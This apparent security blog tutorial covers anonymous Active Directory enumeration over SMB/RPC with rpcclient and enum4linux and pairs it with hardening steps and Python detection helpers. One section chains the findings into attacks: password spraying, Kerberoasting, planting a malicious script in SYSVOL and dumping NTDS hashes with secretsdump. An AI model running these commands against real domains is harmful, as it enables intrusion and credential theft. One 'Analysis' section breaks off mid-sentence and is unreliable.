
Introduction:
Active Directory (AD) remains the central identity store for most enterprises, but its reliance on legacy protocols like SMB and RPC creates a sprawling attack surface. Net RPC, a component of the Samba suite, allows attackers—and ethical hackers—to remotely query AD for domain users, groups, password policies, and SID mappings without any credentials, effectively mapping the entire domain for privilege escalation.
Learning Objectives:
- Understand how Net RPC interacts with SMB/RPC services to perform unauthenticated AD enumeration.
- Execute practical enumeration commands using `rpcclient`, `enum4linux`, and native Windows tools to extract critical domain data.
- Implement defensive hardening measures to detect, block, and mitigate anonymous SMB/RPC reconnaissance.
You Should Know
1. Setting Up Net RPC and Performing Basic Null Session Enumeration
Net RPC is part of the Samba client suite. Attackers leverage a “null session” (anonymous login) to connect to a Domain Controller’s SMB/RPC endpoint. The following steps demonstrate how to install the tools and extract foundational AD information.
Step‑by‑step guide (Linux – Kali/Parrot/Ubuntu):
```bash
# Install the Samba client tools (on Debian/Ubuntu/Kali the package is smbclient, which ships rpcclient)
sudo apt update && sudo apt install smbclient -y
# Identify a Domain Controller (e.g., via Nmap)
nmap -p445,139 --open -T4 192.168.1.0/24
# Connect anonymously to the target DC
rpcclient -U "" -N 192.168.1.10
```
Once inside the `rpcclient` shell, run these commands:
```
# Server information
srvinfo
# Domain name and SID
lsaquery
# Domain users
enumdomusers
# Domain groups
enumdomgroups
# Domain password policy
getdompwinfo
```
What this does:
The `-U "" -N` flags specify an empty username and null password, creating an anonymous SMB session. From there, RPC calls like `enumdomusers` query the SAM database for user names, revealing valid logon accounts for later password spraying or brute‑forcing.
2. Extracting Password Policies and SID Mappings
Password policy disclosure is a goldmine for attackers – it reveals lockout thresholds, password complexity, and minimum length, allowing them to craft stealthy brute‑force attacks. SID (Security Identifier) mapping helps associate well‑known RIDs (e.g., 500 for Administrator) with actual usernames.
Step‑by‑step guide (using rpcclient and enum4linux):
From inside `rpcclient`:

```
# Password policy
getdompwinfo
# Extract the domain SID
lsaquery
# Map RIDs to users (RID cycling)
lookupnames administrator
lookupsids S-1-5-21-123456789-1234567890-123456789-500
```

Example `getdompwinfo` output:

```
min_password_length: 7
password_properties: 0x00000001 (DOMAIN_PASSWORD_COMPLEX)
lockout_duration: 30 mins
```
Automated enumeration with enum4linux:
```bash
enum4linux -P 192.168.1.10   # Password policy only
enum4linux -S 192.168.1.10   # Share enumeration
enum4linux -U 192.168.1.10   # User list
enum4linux -a 192.168.1.10   # All-in-one (noisy)
```
Defensive takeaway:
If you see `min_password_length: 0` or `lockout_threshold: 0`, the domain is severely misconfigured. Attackers will immediately start password guessing without fear of account lockout.
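The check above can be automated. The following is an added example, not code from the original post: it parses `getdompwinfo`-style `key: value` output (the sample input is constructed in the format shown above) and reports every setting that falls below the baseline from this post's mitigation summary (minimum length 12, lockout enabled, complexity on). The helper names `parse_policy` and `assess_policy` are this example's own.

```python
import re

# Constructed sample output, modelled on the getdompwinfo line format shown in this post.
SAMPLE_POLICY = """\
min_password_length: 7
password_properties: 0x00000001 (DOMAIN_PASSWORD_COMPLEX)
lockout_duration: 30 mins
lockout_threshold: 0
"""

DOMAIN_PASSWORD_COMPLEX = 0x00000001  # flag bit inside password_properties


def parse_policy(text: str) -> dict:
    """Parse 'key: value' lines into a dict; decimal or 0x-hex values become ints."""
    policy = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, _, value = line.partition(":")
        value = value.strip()
        match = re.match(r"0x([0-9a-fA-F]+)|(\d+)", value)
        if match:
            hex_part, dec_part = match.groups()
            policy[key.strip()] = int(hex_part, 16) if hex_part is not None else int(dec_part)
        else:
            policy[key.strip()] = value
    return policy


def assess_policy(policy: dict, baseline_min_length: int = 12) -> list:
    """Return findings where the policy is weaker than the baseline (hypothetical helper)."""
    findings = []

    length = policy.get("min_password_length")
    if length is None:
        findings.append("min_password_length missing from output")
    elif length == 0:
        findings.append("min_password_length is 0: empty passwords are accepted")
    elif length < baseline_min_length:
        findings.append(f"min_password_length {length} is below the baseline of {baseline_min_length}")

    threshold = policy.get("lockout_threshold")
    if threshold is None:
        findings.append("lockout_threshold missing from output")
    elif threshold == 0:
        findings.append("lockout_threshold is 0: unlimited guessing with no account lockout")

    props = policy.get("password_properties", 0)
    if isinstance(props, int) and not props & DOMAIN_PASSWORD_COMPLEX:
        findings.append("DOMAIN_PASSWORD_COMPLEX is not set: complexity requirements are off")

    return findings


if __name__ == "__main__":
    for finding in assess_policy(parse_policy(SAMPLE_POLICY)):
        print("WEAK:", finding)
```

Run against the constructed sample, it flags the 7-character minimum and the zero lockout threshold while leaving the complexity flag alone; a hardened policy returns an empty list, which makes the function easy to drop into a scheduled compliance check.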
3. Enumerating SMB Shares and Performing RID Bruteforcing
Beyond users and policies, attackers enumerate writable shares (potential persistence points) and perform RID cycling to discover hidden accounts – including service accounts and disabled but still valid users.
Step‑by‑step guide:
```bash
# List all SMB shares anonymously
rpcclient -U "" -N 192.168.1.10 -c "netshareenumall"

# Manual RID cycling (bruteforce); <domain_sid> is the sub-authority part of the
# domain SID returned by lsaquery
for rid in 500 501 502 {1000..1010}; do
  rpcclient -U "" -N 192.168.1.10 -c "lookupsids S-1-5-21-<domain_sid>-$rid"
done

# Using enum4linux for RID brute-forcing (-R sets the RID range and implies -r)
enum4linux -R 500-2000 192.168.1.10
```
Sample output of a hidden account:
```
S-1-5-21-...-1008: unknown\unknown (8)
S-1-5-21-...-1009: DOMAIN\svc_backup (1)
```
The `svc_backup` account likely has high privileges – a prime target for Kerberoasting.
Windows alternative (if RSAT is installed):
```cmd
REM Enumerate domain users (requires an authenticated context, but useful post-compromise)
net user /domain
REM Enumerate groups
net group "Domain Admins" /domain
```
4. Native Windows Commands for AD Enumeration (Post‑Compromise)
While Net RPC is primarily a Linux tool, red teams often pivot to Windows hosts. Native Windows commands and PowerShell can replicate much of the same enumeration once a foothold is gained.
Step‑by‑step guide (from a domain‑joined Windows host):
```cmd
REM Basic domain info
nltest /domain_trusts
nltest /dsgetdc:DOMAIN_NAME
REM List users and groups
net user /domain
net group "Domain Admins" /domain
net localgroup Administrators
REM SMB share discovery
net view \\DC01 /all
```
PowerShell for deeper enumeration (no RSAT required):
```powershell
# Get current domain SID (objectSid is returned as a raw byte array)
$domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$domain.GetDirectoryEntry().objectSid

# List all domain users (via ADSI)
$searcher = [ADSISearcher]"(objectClass=user)"
$searcher.FindAll() | ForEach-Object { $_.Properties.name }

# Enumerate password policy
net accounts /domain
```
Note: Native Windows commands often require an authenticated context. Attackers first use Net RPC anonymously, then switch to Windows tools after credential theft.
5. Defensive Hardening Against SMB/RPC Reconnaissance
Preventing anonymous Net RPC enumeration is straightforward but frequently overlooked. The following steps lock down SMB/RPC on Domain Controllers and member servers.
Step‑by‑step guide (Windows Server hardening):
1. Restrict anonymous null session access
Via Group Policy or registry:
```powershell
# Set RestrictAnonymous = 2 (no access without explicit anonymous permissions).
# Test first: 2 denies all anonymous access and can break legacy clients or services that rely on it.
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RestrictAnonymous" -Value 2 -Type DWord
```
2. Disable SMBv1 and enforce SMB signing
```powershell
# Disable SMBv1 (optional-feature removal; on Windows Server 2012 R2 and later the
# SMB server setting below achieves the same without a feature removal)
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
Set-SmbServerConfiguration -EnableSMB1Protocol $false
# Enforce SMB signing (Group Policy: Microsoft network client/server: Digitally sign communications (always))
Set-SmbServerConfiguration -RequireSecuritySignature $true -EnableSMB2Protocol $true
```
3. Block port 445/139 from untrusted networks
Use Windows Firewall or network ACLs:
```powershell
# Windows Firewall evaluates block rules before allow rules, so a block rule whose
# -RemoteAddress is the trusted subnet would cut off the clients you want to keep.
# Instead, allow SMB only from the trusted subnet and let the default inbound Block
# action drop everything else; also disable the built-in rules that allow SMB from Any.
Set-NetFirewallProfile -All -DefaultInboundAction Block
Disable-NetFirewallRule -DisplayGroup "File and Printer Sharing"
New-NetFirewallRule -DisplayName "Allow SMB from internal only" -Direction Inbound -Protocol TCP -LocalPort 445,139 -Action Allow -RemoteAddress 192.168.1.0/24
```
4. Monitor for suspicious RPC calls
Enable advanced audit policies:
```cmd
auditpol /set /subcategory:"SAM" /success:enable /failure:enable
auditpol /set /subcategory:"User Account Management" /success:enable /failure:enable
REM Event ID 4624 needs the Logon subcategory; 5140 needs the File Share subcategory
auditpol /set /subcategory:"Logon" /success:enable /failure:enable
auditpol /set /subcategory:"File Share" /success:enable /failure:enable
```
Look for Event ID 4624 with account `ANONYMOUS LOGON` and logon type 3 (network), and Event ID 5140 (a network share object was accessed, typically `IPC$` for RPC enumeration).
Linux‑side detection:
Network defenders can use Zeek (formerly Bro) to detect `rpcclient` enumeration:
```bash
zeek -C -r capture.pcap smb_rpc.zeek
```
Look for high volumes of SMB session setups with empty usernames.
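The "high volume of anonymous session setups" signal above can be expressed as a simple sliding-window rule. The following is an added example, not code from the original post or from Zeek: it works over constructed, simplified event records (time, event id, account, logon type, source IP, share), not real EVTX or Zeek log parsing, and flags any source that produces a burst of 4624 `ANONYMOUS LOGON` network logons, reporting that source's `IPC$` accesses (5140) as supporting context. The helper names and the threshold of 5 logons per 60 seconds are this example's own choices.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs) in a simplified form:
# time|event_id|account|logon_type|source_ip|share
SAMPLE_EVENTS = [
    "2024-05-01T10:00:01|4624|ANONYMOUS LOGON|3|192.168.1.50|-",
    "2024-05-01T10:00:02|5140|ANONYMOUS LOGON|-|192.168.1.50|IPC$",
    "2024-05-01T10:00:03|4624|ANONYMOUS LOGON|3|192.168.1.50|-",
    "2024-05-01T10:00:05|4624|ANONYMOUS LOGON|3|192.168.1.50|-",
    "2024-05-01T10:00:06|4624|jsmith|3|192.168.1.20|-",
    "2024-05-01T10:00:08|4624|ANONYMOUS LOGON|3|192.168.1.50|-",
    "2024-05-01T10:00:09|5140|ANONYMOUS LOGON|-|192.168.1.50|IPC$",
    "2024-05-01T10:00:12|4624|ANONYMOUS LOGON|3|192.168.1.50|-",
    "2024-05-01T10:00:15|4624|ANONYMOUS LOGON|3|192.168.1.50|-",
    "2024-05-01T10:02:40|4624|ANONYMOUS LOGON|3|192.168.1.77|-",
    "2024-05-01T10:30:00|4624|ANONYMOUS LOGON|3|192.168.1.50|-",
]


def parse_event(line: str) -> dict:
    """Split one constructed record into typed fields."""
    ts, event_id, account, logon_type, src, share = line.split("|")
    return {
        "time": datetime.fromisoformat(ts),
        "event_id": int(event_id),
        "account": account,
        "logon_type": None if logon_type == "-" else int(logon_type),
        "src": src,
        "share": share,
    }


def is_null_session_logon(ev: dict) -> bool:
    """4624 for ANONYMOUS LOGON over the network (logon type 3) is the null-session signature."""
    return ev["event_id"] == 4624 and ev["account"].upper() == "ANONYMOUS LOGON" and ev["logon_type"] == 3


def max_in_window(times: list, window: timedelta) -> int:
    """Largest number of timestamps that fall inside any window of the given length."""
    times = sorted(times)
    best = start = 0
    for end in range(len(times)):
        while times[end] - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_null_session_bursts(lines, threshold: int = 5, window_seconds: int = 60) -> list:
    """Flag sources with at least `threshold` anonymous network logons inside `window_seconds`.
    IPC$ share accesses (5140) from the same source are reported as supporting context."""
    logon_times = defaultdict(list)
    ipc_access = defaultdict(int)
    for line in lines:
        ev = parse_event(line)
        if is_null_session_logon(ev):
            logon_times[ev["src"]].append(ev["time"])
        elif ev["event_id"] == 5140 and ev["share"].upper().endswith("IPC$"):
            ipc_access[ev["src"]] += 1

    alerts = []
    for src, times in logon_times.items():
        peak = max_in_window(times, timedelta(seconds=window_seconds))
        if peak >= threshold:
            alerts.append({
                "src": src,
                "peak_logons": peak,
                "total_logons": len(times),
                "ipc_accesses": ipc_access[src],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_null_session_bursts(SAMPLE_EVENTS):
        print(f"ALERT: {alert['src']} made {alert['peak_logons']} anonymous SMB logons within 60s "
              f"({alert['total_logons']} total, {alert['ipc_accesses']} IPC$ accesses)")
```

The sliding window matters: a single anonymous logon from a printer or legacy scanner is normal in many environments, while six in fifteen seconds against a Domain Controller is the shape of an `rpcclient` or `enum4linux -a` run. Tune the threshold from a baseline of your own 4624 volume before alerting on it.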
6. Exploiting Misconfigurations for Privilege Escalation (Red Team Perspective)
Once Net RPC reveals weak password policies, unconstrained delegation, or SIDHistory, attackers escalate from enumeration to exploitation. This section shows how to chain the gathered information.
Step‑by‑step guide (for authorized penetration testing only):
1. Crack password policy weaknesses
If `min_password_length < 8` and lockout_threshold = 0, launch a password spraying attack:
crackmapexec smb 192.168.1.10 -u users.txt -p 'Password123' --continue-on-success
2. Kerberoast high‑privileged accounts
Use the list of domain users from `enumdomusers` to request service tickets:
impacket-GetUserSPNs -request -dc-ip 192.168.1.10 DOMAIN/users.txt
3. Pivot via writable SMB shares
If `netshareenumall` shows a writable `NETLOGON` or `SYSVOL` misconfiguration, plant a malicious script:
smbclient //192.168.1.10/SYSVOL -N -c "put evil.bat"
4. Extract NTDS.dit using RPC
With a captured domain admin hash, use Impacket’s secretsdump:
impacket-secretsdump -just-dc-ntlm DOMAIN/[email protected]
Mitigation summary:
- Enforce `RestrictAnonymous=2` and SMB signing.
- Set `min_password_length=12` and enable lockout policies.
- Regularly audit for writable shares and over‑privileged service accounts.
What Undercode Say
Key Takeaway 1:
Net RPC transforms legacy SMB/RPC protocols into a low‑effort AD reconnaissance engine – no credentials, no exploit, just native Windows functionality exposed over the network.
Key Takeaway 2:
Anonymous null session enumeration remains a persistent blind spot. Many organizations disable SMBv1 but leave RestrictAnonymous at default (0 or 1), allowing attackers to extract the entire domain user list and password policy in seconds.
Analysis (10 lines):
The simplicity of `rpcclient -U “” -N
Prediction
As on‑premises Active Directory continues to coexist with Azure AD and Entra ID, attackers will blend legacy SMB/RPC enumeration (via Net RPC) with modern cloud reconnaissance. Expect automated frameworks that first map an organization’s on‑prem AD structure using null sessions, then pivot to Azure AD Connect misconfigurations – such as over‑privileged sync accounts or unhardened pass‑through authentication – to compromise the entire hybrid tenant. Defenders will finally be forced to deprecate NTLM entirely, enforce SMB over QUIC for remote access, and migrate to strictly Kerberos‑only authentication with frequent ticket rotation. Additionally, Microsoft may introduce a “legacy protocol kill‑switch” in future Windows Server releases, breaking Net RPC enumeration for good – but until then, every red team should keep `rpcclient` on their USB drive.
Reported By: Active Directory – Hackers Feeds


